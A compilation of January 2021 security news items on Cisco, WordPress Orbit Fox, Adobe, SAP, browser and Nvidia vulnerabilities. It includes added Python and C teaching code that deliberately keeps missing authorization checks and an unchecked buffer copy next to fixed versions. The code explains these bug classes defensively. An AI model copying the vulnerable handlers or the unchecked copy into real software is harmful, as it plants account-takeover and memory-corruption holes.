Cisco notes that the web-based management interface on these devices can be accessed either from the LAN or through a WAN connection, provided that remote management is enabled. However, the remote management feature is disabled by default on these devices.

“Cisco has not released and will not release software updates to address the vulnerabilities described […]. The Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers have entered the end-of-life process. Customers are advised to refer to the end-of-life notices for these products,” the company underlines.

Eight other vulnerabilities that remain unpatched in the same small business router series have been assessed as medium severity. These bugs could be abused by authenticated, remote attackers to launch cross-site scripting (XSS) attacks or access sensitive, browser-based information.

According to Cisco, there are no workarounds to address these vulnerabilities. However, the company says that it is not aware of public exploits targeting the security bugs.

Cisco this week released patches for tens of vulnerabilities, including two high-severity issues in enterprise software solutions.

The most important of these flaws is CVE-2021-1144, a high-severity bug (CVSS score of 8.8) in Connected Mobile Experiences (CMX) that could be abused by an authenticated attacker to modify the passwords for any user account on the system, including administrator accounts.

The bug exists because authorization checks for changing passwords are not correctly handled, enabling exploitation by an authenticated attacker, even if they do not have administrative privileges. The attacker can abuse the bug through sending a modified HTTP request to a vulnerable device.

Another high-severity flaw was found in the AnyConnect Secure Mobility Client for Windows, affecting the endpoint solution’s Network Access Manager and Web Security Agent components.

Tracked as CVE-2021-1237 (CVSS score of 7.8), the issue could be abused by an authenticated, local attacker for DLL injection. The bug exists because resources that the application loads at runtime are insufficiently validated.

“An attacker could exploit this vulnerability by inserting a configuration file in a specific path in the system which, in turn, causes a malicious DLL file to be loaded when the application starts. A successful exploit could allow the attacker to execute arbitrary code on the affected machine with SYSTEM privileges,” Cisco explains.

The tech giant has released software updates to address both of these vulnerabilities and says that it is not aware of public exploits targeting any of them.

Cisco also published 18 other advisories detailing medium-severity bugs in Webex, ASR 5000 routers, Proximity Desktop for Windows, Enterprise NFV Infrastructure Software (NFVIS), Finesse, Video Surveillance 8000 IP Cameras, Firepower Management Center (FMC), DNA Center, Unified Communications products, CMX API authorizations, and AnyConnect Secure Mobility Client.

Three medium-severity vulnerabilities related to the Snort detection engine were found to impact a broad range of Cisco products, including Integrated Services Routers (ISRs), Cloud Services Router 1000V, Firepower Threat Defense (FTD), Integrated Services Virtual Router (ISRv), and several Meraki product series.

Details on these vulnerabilities can be found in the advisories Cisco published on its security portal.


High-Severity Cisco Flaw Found in CMX Software For Retailers

14.1.2021  Vulnerebility  Threatpost

Cisco fixed high-severity flaws tied to 67 CVEs overall, including ones found in its AnyConnect Secure Mobility Client and in its RV110W, RV130, RV130W, and RV215W small business routers.

A high-severity flaw in Cisco’s smart Wi-Fi solution for retailers could allow a remote attacker to alter the password of any account user on affected systems.

The vulnerability is part of a number of patches issued by Cisco addressing 67 high-severity CVEs on Wednesday. This included flaws found in Cisco’s AnyConnect Secure Mobility Client, as well as Cisco RV110W, RV130, RV130W, and RV215W small business routers.

The most serious flaw afflicts Cisco Connected Mobile Experiences (CMX), a software solution that is utilized by retailers to provide business insights or on-site customer experience analytics. The solution uses the Cisco wireless infrastructure to collect a treasure trove of data from the retailer’s Wi-Fi network, including real-time customer-location tracking.

For instance, if a customer connects to the Wi-Fi network of a store that utilizes CMX, retailers can track their locations within the venue, observe their behavior, and deliver special offers or promotions to them while they’re there.

The vulnerability (CVE-2021-1144) is due to incorrect handling of authorization checks for changing a password. The flaw ranks 8.8 out of 10 on the CVSS vulnerability-severity scale, making it high severity. Of note, to exploit the flaw, an attacker must have an authenticated CMX account – but would not need administrative privileges.

“An authenticated attacker without administrative privileges could exploit this vulnerability by sending a modified HTTP request to an affected device,” said Cisco. “A successful exploit could allow the attacker to alter the passwords of any user on the system, including an administrative user, and then impersonate that user.”

Admins have a variety of privileges, including the ability to use File Transfer Protocol (FTP) commands for backing up and restoring data on Cisco CMX and gaining access to credentials (in order to unlock users who have been locked out of their accounts).

This vulnerability affects Cisco CMX releases 10.6.0, 10.6.1, and 10.6.2; the issue is patched in Cisco CMX releases 10.6.3 and later.

Other High-Severity Flaws
Another high-severity flaw (CVE-2021-1237) exists in the Cisco AnyConnect Secure Mobility Client for Windows. AnyConnect Secure Mobility Client, a modular endpoint software product, provides a wide range of security services (such as remote access, web security features and roaming protection) for endpoints.

The flaw allows attackers – if they are authenticated and local – to perform a dynamic-link library (DLL) injection attack. To exploit this vulnerability, the attacker would need to have valid credentials on the Windows system, Cisco said.

“An attacker could exploit this vulnerability by inserting a configuration file in a specific path in the system which, in turn, causes a malicious DLL file to be loaded when the application starts,” according to Cisco. “A successful exploit could allow the attacker to execute arbitrary code on the affected machine with system privileges.”

Sixty of those CVEs exist in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W and RV215W routers. These flaws could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly.

“An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device,” according to Cisco. “A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial-of-service (DoS) condition.”

And, five more CVEs (CVE-2021-1146, CVE-2021-1147, CVE-2021-1148, CVE-2021-1149 and CVE-2021-1150) in the Cisco Small Business RV110W, RV130, RV130W, and RV215W routers could allow an authenticated, remote attacker to inject arbitrary commands that are executed with root privileges.


Critical WordPress-Plugin Bug Found in ‘Orbit Fox’ Allows Site Takeover

14.1.2021  Vulnerebility  Threatpost
Two security vulnerabilities — one a privilege-escalation problem and the other a stored XSS bug — afflict a WordPress plugin with 40,000 installs.

Two vulnerabilities (one critical) in a WordPress plugin called Orbit Fox could allow attackers to inject malicious code into vulnerable websites and/or take control of a website.

Orbit Fox is a multi-featured WordPress plugin that works with the Elementor, Beaver Builder and Gutenberg site-building utilities. It allows site administrators to add features such as registration forms and widgets. The plugin, from a developer called ThemeIsle, has been installed by 400,000+ sites.

According to researchers at Wordfence, the first flaw (CVEs are pending) is an authenticated privilege-escalation flaw that carries a CVSS bug-severity score of 9.9, making it critical. Authenticated attackers with contributor level access or above can elevate themselves to administrator status and potentially take over a WordPress site.

The second bug meanwhile is an authenticated stored cross-site scripting (XSS) issue that allows attackers with contributor or author level access to inject JavaScript into posts. This injection could be used to redirect visitors to malvertising sites or create new administrative users, among other actions. It’s rated 6.4 on the CVSS scale, making it medium severity.

Privilege Escalation
The privilege-escalation bug exists in the Orbit Fox registration widget, according to researchers.

The widget is used to create registration forms with customizable fields when using the Elementor and Beaver Builder page-builder plugins. Site administrators can set a default role to be assigned to users who register on the site using the form.

“Lower-level users like contributors, authors, and editors were not shown the option to set the default user role from the editor. However, we found that they could still modify the default user role by crafting a request with the appropriate parameter,” Wordfence researchers explained, in a Tuesday posting. “The plugin provided client-side protection to prevent the role selector from being shown to lower-level users while adding a registration form. Unfortunately, there were no server-side protections or validation to verify that an authorized user was actually setting the default user role in a request.”

Server-side validation happens after the form data a user entered reaches the server: the server checks the request for security issues, ensures that the data is formatted correctly, and prepares the submission for insertion into or update of a data source. Unlike client-side checks, it cannot be bypassed by crafting the request directly.

The lack of server-side validation in Orbit Fox means that lower-level contributors, authors and editors for the site could set the user role to that of an administrator upon successful registration – so, all attackers would need to do is register themselves as new users and would then be granted administrator privileges.

“To exploit this flaw, user registration would need to be enabled and the site would need to be running the Elementor or Beaver Builder plugins,” according to Wordfence. “A site with user registration disabled or neither of these plugins installed would not be affected by this vulnerability.”
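Both the Orbit Fox registration widget bug described above and the Cisco CMX password-change bug (CVE-2021-1144) discussed earlier on this page are the same class of defect: a privileged request parameter that the UI hides from lower-level users but that the server honours without checking who sent it. The following is an added, generic illustration in Python, not the plugin's PHP or Cisco's code, and it uses no WordPress API. The user store, roles, request bodies and the role allow-list are constructed for the example; the `*_vulnerable` handlers behave the way the advisories describe, the `*_fixed` handlers add the server-side check.

```python
"""Server-side authorization checks on privileged request parameters.

Added illustration (not Cisco's or ThemeIsle's code). A contributor-level caller
tries to (a) reset another user's password and (b) set the registration form's
default role. The *_vulnerable handlers trust the request body as-is; the
*_fixed handlers verify the caller's role on the server before honouring the
privileged field, and validate the value against an allow-list.
"""
import hashlib
from dataclasses import dataclass


class Forbidden(Exception):
    """Raised when the caller is not authorized for the requested change."""


@dataclass
class User:
    name: str
    role: str           # "administrator", "editor", "author", "contributor", "subscriber"
    password_hash: str


# Roles a site owner may legitimately hand to self-registered users (assumed allow-list).
ALLOWED_DEFAULT_ROLES = {"subscriber", "contributor"}


def hash_password(password: str) -> str:
    # Toy hash for the example only; a real system uses a salted password hash.
    return hashlib.sha256(password.encode()).hexdigest()


def change_password_vulnerable(users, caller, body):
    """Trusts body['username']: any authenticated user can reset anyone's password."""
    target = users[body["username"]]
    target.password_hash = hash_password(body["new_password"])
    return target.name


def change_password_fixed(users, caller, body):
    """Only administrators may change a password other than their own."""
    target_name = body.get("username", caller.name)
    if target_name != caller.name and caller.role != "administrator":
        raise Forbidden(f"{caller.name} may not change the password of {target_name}")
    target = users[target_name]
    target.password_hash = hash_password(body["new_password"])
    return target.name


def set_default_role_vulnerable(settings, caller, body):
    """Hiding the selector in the UI is the only 'protection': the server stores whatever arrives."""
    if "default_role" in body:
        settings["default_role"] = body["default_role"]
    return settings["default_role"]


def set_default_role_fixed(settings, caller, body):
    """Authorize the caller and validate the value before a privileged field is stored."""
    if "default_role" in body:
        if caller.role != "administrator":
            raise Forbidden(f"{caller.name} may not set the default registration role")
        if body["default_role"] not in ALLOWED_DEFAULT_ROLES:
            raise ValueError(f"{body['default_role']!r} is not an allowed default role")
        settings["default_role"] = body["default_role"]
    return settings["default_role"]


def demo():
    """Constructed users and requests; returns what each handler did."""
    users = {
        "admin": User("admin", "administrator", hash_password("admin-initial")),
        "contrib": User("contrib", "contributor", hash_password("contrib-initial")),
    }
    caller = users["contrib"]
    request = {"username": "admin", "new_password": "changed-by-contributor"}
    results = {"vuln_pw_target": change_password_vulnerable(users, caller, request)}
    try:
        change_password_fixed(users, caller, request)
        results["fixed_pw_blocked"] = False
    except Forbidden:
        results["fixed_pw_blocked"] = True

    settings = {"default_role": "subscriber"}
    results["vuln_role"] = set_default_role_vulnerable(settings, caller, {"default_role": "administrator"})
    settings = {"default_role": "subscriber"}
    try:
        set_default_role_fixed(settings, caller, {"default_role": "administrator"})
        results["fixed_role_blocked"] = False
    except Forbidden:
        results["fixed_role_blocked"] = True
    return results


if __name__ == "__main__":
    print(demo())
```

The fixed handlers make two separate decisions that the vulnerable ones skip: whether this caller may touch the field at all (authorization), and whether the supplied value is one the field accepts (validation). Note that the allow-list deliberately excludes "administrator" even for an administrator caller, so a registration form can never be configured to mint new administrators.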

Stored XSS
The medium-severity issue arises because the header and footer script feature in Orbit Fox lets contributors and authors add scripts to posts even though they lack the unfiltered_html capability, according to Wordfence.

“This flaw allowed lower-level users to add malicious JavaScript to posts that would execute in the browser whenever a user navigated to that page,” researchers explained. “As always with XSS vulnerabilities, this would make it possible for attackers to create new administrative users, inject malicious redirects and backdoors, or alter other site content through the use of malicious JavaScript.”

Both problems are patched in version 2.10.3; those sites running versions of Orbit Fox 2.10.2 and below should update as soon as possible.

WordPress Plugin Problems
The Orbit Fox bugs are the latest in a line of faulty WordPress plugins reported in recent months.

In October, two high-severity vulnerabilities in Post Grid, a WordPress plugin with more than 60,000 installations, were found to open the door to site takeovers. To boot, nearly identical bugs were also found in Post Grid’s sister plugin, Team Showcase, which has 6,000 installations.

In September, a high-severity flaw in the Email Subscribers & Newsletters plugin by Icegram was found to affect more than 100,000 WordPress websites.

Earlier, in August, a plugin that is designed to add quizzes and surveys to WordPress websites patched two critical vulnerabilities. The flaws could be exploited by remote, unauthenticated attackers to launch varying attacks – including fully taking over vulnerable websites. Also in August, Newsletter, a WordPress plugin with more than 300,000 installations, was discovered to have a pair of vulnerabilities that could lead to code-execution and even site takeover.

And, researchers in July warned of a critical vulnerability in a WordPress plugin called Comments – wpDiscuz, which is installed on more than 70,000 websites. The flaw gave unauthenticated attackers the ability to upload arbitrary files (including PHP files) and ultimately execute remote code on vulnerable website servers.


Adobe Fixes 7 Critical Flaws, Blocks Flash Player Content
13.1.2021 
Vulnerebility  Threatpost

Adobe issued patches for seven critical arbitrary-code-execution flaws plaguing Windows and macOS users.

Adobe Systems has patched seven critical vulnerabilities, which impact Windows, macOS and Linux users. The impact of the serious flaws ranges from arbitrary code execution to sensitive information disclosure.

The software company’s regularly scheduled Tuesday security updates impact a slew of its multimedia and creativity software products – from Photoshop to Illustrator to Adobe Bridge.

In tandem with Tuesday’s security update, Adobe also began blocking Flash Player content on Tuesday, weeks after dropping support for Flash. The move means that when users attempt to load a page with Flash Player, the content will no longer load.

“Since Adobe will no longer be supporting Flash Player after December 31, 2020 and Adobe will block Flash content from running in Flash Player beginning January 12, 2021, Adobe strongly recommends all users immediately uninstall Flash Player to help protect their systems,” according to Adobe.

‘Priority 3’ Campaign Classic Update
One of the most severe critical flaws (CVE-2021-21009) has been patched in Adobe Campaign Classic, Adobe’s marketing campaign management platform.

“These updates address a critical server-side request forgery (SSRF) vulnerability that could result in sensitive information disclosure,” according to Adobe. SSRF is a web-based flaw that enables attackers to induce the server-side application to make HTTP requests to an arbitrary domain.

Various versions of Adobe Campaign Classic for Windows and Linux users are affected; full details of affected and patched versions are available here.

The flaw has a “priority 2” update ranking, which according to Adobe means that it resolves vulnerabilities in a product that has “historically been at elevated risk” – but for which there are currently no known exploits.

“Based on previous experience, we do not anticipate exploits are imminent,” according to Adobe. “As a best practice, Adobe recommends administrators install the update soon (for example, within 30 days).”

Of note, the remainder of Adobe’s patches, while critical, are “priority 3” updates, Chris Goettl, senior director of product management and security at Ivanti, told Threatpost. Out of the three priorities, “priority 1” is the most severe, while “priority 3” is the least serious. “Priority 3” updates resolve flaws in a product that has historically not been a target for attackers.

“Given this guidance, administrators should look to update Adobe Campaign Classic in their monthly maintenance,” Goettl told Threatpost. “The rest of the updates should be evaluated and updated as reasonable as it is never good to let software stagnate.”

Other Critical Flaws
In Adobe’s flagship Photoshop photo-editing application, the company fixed a critical-severity heap-based buffer overflow vulnerability (CVE-2021-21006). A heap-based buffer overflow is a class of vulnerability where the region of a process’ memory used to store dynamic variables (the heap) can be overwhelmed. If exploited, this flaw could enable arbitrary code execution.

The bug affects Photoshop 2021 version 22.1 and earlier for Windows and macOS; users should update to version 22.1.1.

Adobe’s Illustrator design application also has a critical flaw (CVE-2021-21007) stemming from an uncontrolled search path element. This category of vulnerability occurs when an application uses a fixed (or controlled) search path to find resources – but one or more locations of the path are under control of a malicious user.

The flaw, which could enable arbitrary code execution, exists in Illustrator 2020 for Windows and macOS versions 25 and earlier; version 25.1 contains the fix.

Adobe Bridge, Adobe’s digital asset management app, had critical vulnerabilities tied to two CVEs, CVE-2021-21012 and CVE-2021-21013.

Both errors stem from out-of-bounds write issues, in which write operations past the end of a buffer produce undefined or unexpected results. If exploited, the flaws can result in arbitrary code execution.

Both flaws exist in Adobe Bridge version 11 and earlier for Windows; a fix has been issued in version 11.0.1.

Adobe also fixed critical flaws in its Adobe Animate (CVE-2021-21008) and Adobe InCopy (CVE-2021-21010); as well as an important-severity flaw in Adobe Captivate (CVE-2021-21011).

The January patches follow Adobe’s regularly scheduled December security updates, where the company issued fixes for flaws tied to one important-rated and three critical-severity CVEs across its Adobe Prelude, Adobe Experience Manager and Adobe Lightroom applications.


SAP Patches Serious Code Injection, DoS Vulnerabilities
13.1.2021  Vulnerebility  Securityweek

German software maker SAP has published 10 advisories to document flaws and fixes for a range of serious security vulnerabilities.

SAP also published a total of 7 other updates for previously released security notes on this month’s Patch Day, for a total of 17 Notes. Five of these carry the highest severity rating of Hot News.

The most important of these issues, dealing with multiple vulnerabilities in SAP Business Warehouse, carry a CVSS score of 9.9.

The first of the notes addressed CVE-2021-21465, which SAP describes as multiple issues in Business Warehouse (Database Interface). These bugs are an SQL Injection and a missing authorization check (that features a CVSS score of 6.5), Onapsis, a firm that secures Oracle and SAP applications, explains.

“An improper sanitization of provided SQL commands allowed an attacker to execute arbitrary SQL commands on the database which could lead to a full compromise of the affected system,” Onapsis notes in a blog shared with SecurityWeek. Minimum privileges are required for successful exploitation.

The missing authorization check could be exploited to read any database table. Because SAP decided to fix the bug through disabling the function module, applying the patch will result in a dump of all of the applications that call this function module.

The second serious issue addresses CVE-2021-21466, a code injection flaw in both Business Warehouse and BW/4HANA.

Caused by insufficient input validation, the flaw could be abused to inject malicious code that gets stored persistently as a report and which could be executed afterwards, potentially affecting the confidentiality, integrity, and availability of systems. The attacker needs low privileges for exploitation.

The remaining three are updates for fixes previously released in April 2018 (updates for the Chrome browser in Business Client – CVSS score of 10), November 2020 (privilege escalation in NetWeaver Application Server for Java – CVSS score of 9.1), and December 2020 (code injection in Business Warehouse – CVSS score of 9.1).

A single advisory with a severity rating of High Priority was released this month, to address CVE-2021-21446 (CVSS score of 7.5), a denial of service issue in SAP NetWeaver AS ABAP and ABAP Platform.

A second warning that SAP released prior to the January 2021 Patch day fixes “an issue in the binding process of the Central Order service to a Cloud Foundry application” that could have allowed “unauthorized SAP employees to access the binding credentials of the service.”

Assessed as Medium and Low Priority, the remaining security notes address vulnerabilities in SAP Commerce Cloud, BusinessObjects, Master Data Governance, NetWeaver, GUI for Windows, 3D Visual Enterprise Viewer, Banking Services, and EPM add-in.


Adobe Releases First Security Updates of 2021 as It Blocks Flash Content
13.1.2021 
Vulnerebility  Securityweek

Adobe on Tuesday released its first round of security updates for 2021, just as the company starts blocking Flash content.

Adobe has patched a total of eight vulnerabilities across seven of its products, including Photoshop, Illustrator, Animate, Campaign Classic, InCopy, Captivate and Bridge.

The company fixed two critical out-of-bounds write bugs in its digital asset management app Bridge. Both vulnerabilities can be exploited for arbitrary code execution in the context of the targeted user.

As for the remaining products, Adobe patched one vulnerability in each. Critical arbitrary code execution flaws were addressed in Photoshop, Illustrator, Animate and InCopy. A critical SSRF issue that can lead to sensitive information disclosure was fixed in Campaign Classic, and a privilege escalation bug rated important was patched in Captivate.

Adobe says there is no indication that the vulnerabilities patched on Tuesday have been exploited for malicious purposes and, based on the priority ratings assigned by the company to each update, it does not expect them to be leveraged by threat actors in their attacks.

On Tuesday, January 12, Adobe started blocking Flash content from running in Flash Player after the software reached end of life on December 31, 2020. Major web browser vendors are also disabling Flash Player and Adobe will remove all download links.

Flash Player vulnerabilities were often exploited by threat actors in their operations, but hackers increasingly started turning their attention to other software after Adobe, in mid-2017, announced plans to kill Flash.

In 2018, when threat groups were still targeting Flash vulnerabilities, Adobe released over a dozen security updates, but the number of updates dropped to six in 2019 and only three in 2020.


Bugs in Firefox, Chrome, Edge Allow Remote System Hijacking

9.1.2021  Vulnerebility  Threatpost

Major browsers get an update to fix separate bugs that both allow for remote attacks, which could potentially allow hackers to take over targeted devices.

Makers of the Chrome, Firefox and Edge browsers are urging users to patch critical vulnerabilities that if exploited allow hackers to hijack systems running the software.

The Mozilla Firefox vulnerability (CVE-2020-16044) is separate from a bug reported in Google’s browser engine Chromium, which is used in the Google Chrome browser and Microsoft’s latest version of its Edge browser.

Critical Firefox Use-After-Free Bug
On Thursday, the Cybersecurity and Infrastructure Security Agency (CISA) urged users of Mozilla Foundation’s Firefox browser to patch a bug, tracked as CVE-2020-16044, and rated as critical. The vulnerability is classified as a use-after-free bug and tied to the way Firefox handles browser cookies and if exploited allows hackers to gain access to the computer, phone or tablet running the browser software.

Impacted are Firefox browser versions released prior to the recently released Firefox desktop 84.0.2, Firefox Android 84.1.3 edition and also Mozilla’s corporate ESR 78.6.1 version of Firefox.

“A malicious peer could have modified a COOKIE-ECHO chunk in a SCTP packet in a way that potentially resulted in a use-after-free. We presume that with enough effort it could have been exploited to run arbitrary code,” according to a Mozilla security bulletin posted Thursday.
The acronym SCTP stands for Stream Control Transmission Protocol, used in computer networking to carry protocol data within the Transport Layer of the internet protocol suite, or TCP/IP. The bug is tied to the way cookie data is handled by SCTP.

Each inbound SCTP packet contains a cookie chunk that facilitates a corresponding reply from the browser’s cookie. A COOKIE-ECHO chunk is a snippet of data sent during the initialization of the SCTP connection with the browser.

According to Mozilla, an adversary could craft a malicious COOKIE-ECHO chunk to impact the browser’s memory. “A use-after-free vulnerability relates to incorrect use of dynamic memory during program operation. If after freeing a memory location, a program does not clear the pointer to that memory, an attacker can use the error to hack the program,” according to a description of the vulnerability.
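
The description above names the root cause (a pointer that outlives the memory it points to) and the remedy (clear it after free). The following C example, added here and not taken from Mozilla’s or Firefox’s code, generalizes that remedy: objects are reached through generation-tagged handles rather than raw pointers, so freeing a slot invalidates every outstanding reference at once, and a stale handle resolves to NULL instead of to reused memory. The session pool, the handle layout and the peer names are all constructed for this illustration.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Constructed example: a tiny object pool addressed by generation-tagged
 * handles. Not Firefox's SCTP code; it shows the discipline that prevents a
 * freed object from being reached through an old reference. */
#define POOL_SLOTS 4

typedef struct { char name[16]; int active; } session_t;

/* A handle names a slot and the generation that was current when it was
 * issued. Any free of that slot bumps the generation, so the handle goes stale. */
typedef struct { uint16_t slot; uint16_t gen; } handle_t;

static session_t pool[POOL_SLOTS];
static uint16_t  pool_gen[POOL_SLOTS];
static int       pool_used[POOL_SLOTS];

/* Allocate a session. On exhaustion the returned slot equals POOL_SLOTS,
 * which session_get() rejects like any other invalid handle. */
handle_t session_new(const char *name) {
    for (uint16_t i = 0; i < POOL_SLOTS; i++) {
        if (!pool_used[i]) {
            pool_used[i] = 1;
            memset(&pool[i], 0, sizeof pool[i]);
            strncpy(pool[i].name, name, sizeof pool[i].name - 1);
            pool[i].active = 1;
            return (handle_t){ i, pool_gen[i] };
        }
    }
    return (handle_t){ POOL_SLOTS, 0 };
}

/* Resolve a handle: NULL when the slot is free, out of range, or the
 * generation no longer matches (i.e. the object was freed after issue). */
session_t *session_get(handle_t h) {
    if (h.slot >= POOL_SLOTS || !pool_used[h.slot] || pool_gen[h.slot] != h.gen)
        return NULL;
    return &pool[h.slot];
}

/* Free through a handle. A second free with any handle to the same slot
 * fails (-1) instead of corrupting state, and the memory is scrubbed. */
int session_free(handle_t h) {
    if (session_get(h) == NULL) return -1;
    pool_used[h.slot] = 0;
    pool_gen[h.slot]++;
    memset(&pool[h.slot], 0, sizeof pool[h.slot]);
    return 0;
}

/* Walk through the use-after-free scenario: keep a copy of a handle (as a
 * callback or cache might), free the object, let the slot be reused, then
 * try the old copy. Returns 1 when every stale access is refused. */
int demo_stale_handle_rejected(void) {
    handle_t h    = session_new("peer-A");   /* constructed peer name */
    handle_t copy = h;                       /* second reference to the same object */
    session_free(h);
    handle_t h2 = session_new("peer-B");     /* reuses the slot with a new generation */

    int stale_rejected       = (session_get(copy) == NULL);
    int fresh_ok             = (session_get(h2) != NULL &&
                                strcmp(session_get(h2)->name, "peer-B") == 0);
    int double_free_rejected = (session_free(copy) == -1);

    session_free(h2);
    return stale_rejected && fresh_ok && double_free_rejected;
}

int main(void) {
    printf("stale handle rejected: %s\n",
           demo_stale_handle_rejected() ? "yes" : "no");
    return 0;
}
```

With a raw pointer the same sequence would silently hand “peer-A”’s old reference the bytes now belonging to “peer-B”; with the handle the lookup fails closed, which is the behaviour a reviewer should expect from any lifetime-managed object table.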

Mozilla did not credit the bug discovery, nor did it state whether it was a vulnerability actively being exploited in the wild.

Chromium Browser Bug Impacts Chrome and Edge
Also on Thursday, CISA urged Windows, macOS and Linux users of Google’s Chrome browser to patch an out-of-bounds write bug (CVE-2020-15995) impacting the current 87.0.4280.141 version of the software. The CISA warning stated that updating to the latest version of the Chrome browser “addresses vulnerabilities that an attacker could exploit to take control of an affected system.”

Because Microsoft’s latest Edge browser is based on Google Chromium browser engine, Microsoft also urged its users to update to the latest 87.0.664.75 version of its Edge browser.

While researchers at Tenable classify the out-of-bounds bug as critical, both Google and Microsoft classified the vulnerability as high severity. Tencent Security Xuanwu Lab researcher Bohan Liu is credited for finding and reporting the bug.

Interestingly, the CVE-2020-15995 bug dates back to a Chrome for Android security bulletin Google published in October 2020. At the time, the bug was also classified as high-severity. The flaw is identified as an “out of bounds write in V8,” a bug originally found in September 2020 by Liu.

V8 is Google’s open-source and high-performance JavaScript and WebAssembly engine, according to a Google developer description. While the technical specifics of the bug are not available, similar out of bounds write in V8 bugs have allowed remote attackers to exploit a heap corruption via a crafted HTML page.

A heap corruption is a type of memory corruption that occurs in a computer program when the contents of a memory location are modified due to programmatic behavior — malicious or not — that exceeds the intention of the original programmer or program language parameters. A so-called heap-smashing attack can be used to exploit instances of heap corruption, according to an academic paper (PDF) co-authored by Nektarios Georgios Tsoutsos, student member of IEEE and Michail Maniatakos, senior member of IEEE.

“Heap Smashing Attacks exploit dynamic memory allocators (e.g., malloc) by corrupting the control structures defining the heap itself. By overflowing a heap block, attackers could overwrite adjacent heap headers that chain different heap blocks, and eventually cause the dynamic memory allocator to modify arbitrary memory locations as soon as a heap free operation is executed. The malicious payload can also be generated on-the-fly: for example, by exploiting Just-In-Time (JIT) compilation, assembled code can be written on the heap,” they wrote.
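
The quoted paper describes the mechanism from the attacker’s side: an overflow out of one block lands on the header of the next, and the allocator later acts on the corrupted header. The C example below, added here and not taken from the paper, from V8 or from any real allocator, shows the defender’s side of the same layout: a toy bump allocator whose block headers carry a magic tag and a checksum, and a walker that validates the chain the way hardened allocators do before trusting a header on free. The arena size, header fields and the 20-byte sample payload are constructed for this illustration; the overflow stays inside the example’s own arena.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Constructed toy allocator: a header precedes each payload, and headers
 * chain the blocks by size exactly as the quoted description says. */
#define ARENA_SIZE 256
#define HDR_MAGIC  0xA11C0DEu

typedef struct {
    uint32_t magic;     /* first thing an overflow from the previous block hits */
    uint32_t size;      /* payload length; walking the chain depends on it */
    uint32_t checksum;  /* magic ^ size, catches a partial overwrite of size */
} hdr_t;

static unsigned char arena[ARENA_SIZE];
static size_t        arena_used;

/* Headers are copied in and out with memcpy to avoid alignment assumptions. */
static void hdr_write(size_t off, const hdr_t *h) { memcpy(arena + off, h, sizeof *h); }
static void hdr_read(size_t off, hdr_t *h)        { memcpy(h, arena + off, sizeof *h); }

void toy_reset(void) { memset(arena, 0, sizeof arena); arena_used = 0; }

/* Bump allocation: returns a payload pointer, or NULL when the arena is full. */
void *toy_alloc(uint32_t size) {
    if (size == 0 || ARENA_SIZE - arena_used < sizeof(hdr_t) ||
        size > ARENA_SIZE - arena_used - sizeof(hdr_t))
        return NULL;
    hdr_t h = { HDR_MAGIC, size, HDR_MAGIC ^ size };
    hdr_write(arena_used, &h);
    void *payload = arena + arena_used + sizeof(hdr_t);
    arena_used += sizeof(hdr_t) + size;
    return payload;
}

/* Integrity walk, as a hardened allocator would do before honouring free():
 * returns the index of the first block whose header fails, or -1 if clean. */
int toy_heap_check(void) {
    size_t off = 0;
    int idx = 0;
    while (off < arena_used) {
        hdr_t h;
        if (arena_used - off < sizeof(hdr_t)) return idx;
        hdr_read(off, &h);
        if (h.magic != HDR_MAGIC || h.checksum != (h.magic ^ h.size) ||
            h.size > arena_used - off - sizeof(hdr_t))
            return idx;
        off += sizeof(hdr_t) + h.size;
        idx++;
    }
    return -1;
}

/* The defect: a copy that trusts the caller's length. A length larger than
 * the block spills into the neighbouring header. It spills only within this
 * example's own arena, so running it harms no real memory. */
void unchecked_copy(void *dst, const void *src, size_t n) { memcpy(dst, src, n); }

/* Two adjacent 16-byte blocks; 20 bytes are written into the first, so the
 * last four land on the second block's magic. Returns the flagged index (1). */
int demo_overflow_detected(void) {
    toy_reset();
    unsigned char *a = toy_alloc(16);
    unsigned char *b = toy_alloc(16);
    if (!a || !b) return -2;
    unsigned char payload[20];                  /* constructed oversized input */
    memset(payload, 'A', sizeof payload);
    unchecked_copy(a, payload, sizeof payload);
    (void)b;
    return toy_heap_check();
}

/* Same layout with the copy clamped to the block size: chain stays intact (-1). */
int demo_clean(void) {
    toy_reset();
    unsigned char *a = toy_alloc(16);
    unsigned char *b = toy_alloc(16);
    if (!a || !b) return -2;
    unsigned char payload[20];
    memset(payload, 'A', sizeof payload);
    memcpy(a, payload, 16);
    (void)b;
    return toy_heap_check();
}

int main(void) {
    printf("overflowed arena: first bad block = %d\n", demo_overflow_detected());
    printf("clean arena:      first bad block = %d\n", demo_clean());
    return 0;
}
```

Production allocators keep far more state per chunk, but the check is the same in spirit: any header that fails validation on free aborts rather than being followed, which turns the “modify arbitrary memory locations” step of the quoted attack into a crash.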

Neither Microsoft nor Google explains why the October 2020 CVE-2020-15995 is being featured again in both of their Thursday security bulletins. Typically, that is an indication that the original fix was incomplete.

More Chromium Bugs Impact Chrome and Edge
Twelve additional bugs were reported by Google, impacting its Chromium browser engine. Both Google and Microsoft featured the same list of vulnerabilities (CVE-2021-21106, CVE-2021-21107, CVE-2021-21108, CVE-2021-21109, CVE-2021-21110, CVE-2021-21111, CVE-2021-21112, CVE-2021-21113, CVE-2021-21114, CVE-2021-21115, CVE-2021-21116, CVE-2020-16043).

The majority of the bugs were rated high-severity and tied to use-after-free bugs. Three of the vulnerabilities earned bug hunters $20,000 for their efforts. Weipeng Jiang from Codesafe Team of Legendsec at Qi’anxin Group is credited for finding two of the $20,000 bugs (CVE-2021-21106 and CVE-2021-21107). The first is a use-after-free bug tied to Chromium’s autofill function, and the second a use-after-free bug in the Chromium media component.

Leecraso and Guang Gong of 360 Alpha Lab earned $20,000 for CVE-2021-21108, also a use-after-free bug in the browser’s media component.

No technical details were disclosed, and typically aren’t until it’s determined that most Chrome browsers have been updated.


Nvidia releases security updates for GPU display driver and vGPU flaws
9.1.2021 
Vulnerebility  Securityaffairs

Nvidia has released security updates to address high-severity vulnerabilities affecting the Nvidia GPU display driver and vGPU software.
Nvidia has addressed a total of 16 flaws, including high-severity vulnerabilities affecting the Nvidia GPU display driver and vGPU software.

The addressed flaws may lead to denial of service, escalation of privileges, data tampering, or information disclosure.

